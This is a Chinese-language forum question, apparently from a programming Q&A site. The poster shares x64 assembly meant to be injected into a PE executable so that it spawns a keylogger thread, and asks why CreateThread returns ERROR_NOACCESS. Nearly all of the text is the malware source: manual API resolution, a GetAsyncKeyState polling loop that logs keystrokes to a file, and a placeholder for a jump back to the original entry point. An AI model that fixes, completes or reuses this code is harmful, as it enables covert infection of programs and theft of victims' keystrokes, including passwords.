我正在尝试将此代码注入 PE 文件以使用 CreateThread 运行我的程序以在 PE 文件中运行键盘记录器,但 CreateThread 失败并出现 3E6h ERROR_NOACCESS 错误。我在下面的源代码中的错误在哪里?
procedure:
sub rsp, 28h
and rsp, 0fffffffffffffff0h
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [user32dll]
call rax
lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress
lea rbx,[pThread] ;
lea rbx,[ThreadId]
mov qword[rsp+20h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax
add rsp, 28h
db 0 ;JMP PARA OEP
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [user32dll]
call rax
lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress
MOV [GETKEYS],RAX
Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [msvcrtdll]
call rax
lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
lea r8, [filemode]
lea rdx, [file_name]
lea rcx,[fp]
call rax ;TO LOG KEYSTROKES
lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
mov r9,[fp]
mov r8,1
mov rdx,1
lea rcx, [VIRTUAL_KEY_CODE]
call rax ;TO LOG KEYSTROKES
lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
mov rcx,[fp]
call rax
jmp REPS
endp
proc MyGetProcAddress
...
ret
endp
kernel32dll db 'KERNEL32.DLL', 0
loadlibrary7 db 'loadlibraryA', 0
user32dll db 'USER32.DLL', 0
createthread7 db 'CreateThread', 0
msvcrtdll db 'MSVCRT.DLL', 0
getasync db 'GetAsyncKeyState', 0
fopen7 db 'fopen_s', 0
fwrite7 db 'fwrite',0
fclose7 db 'fclose',0
exitproc7 db 'ExitProcess', 0
filemode db 'a',0
file_name db 'log',0
pThread dq 0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS dq 0
VIRTUAL_KEY_CODE dq 0
fp dq 0
Par dq 0
...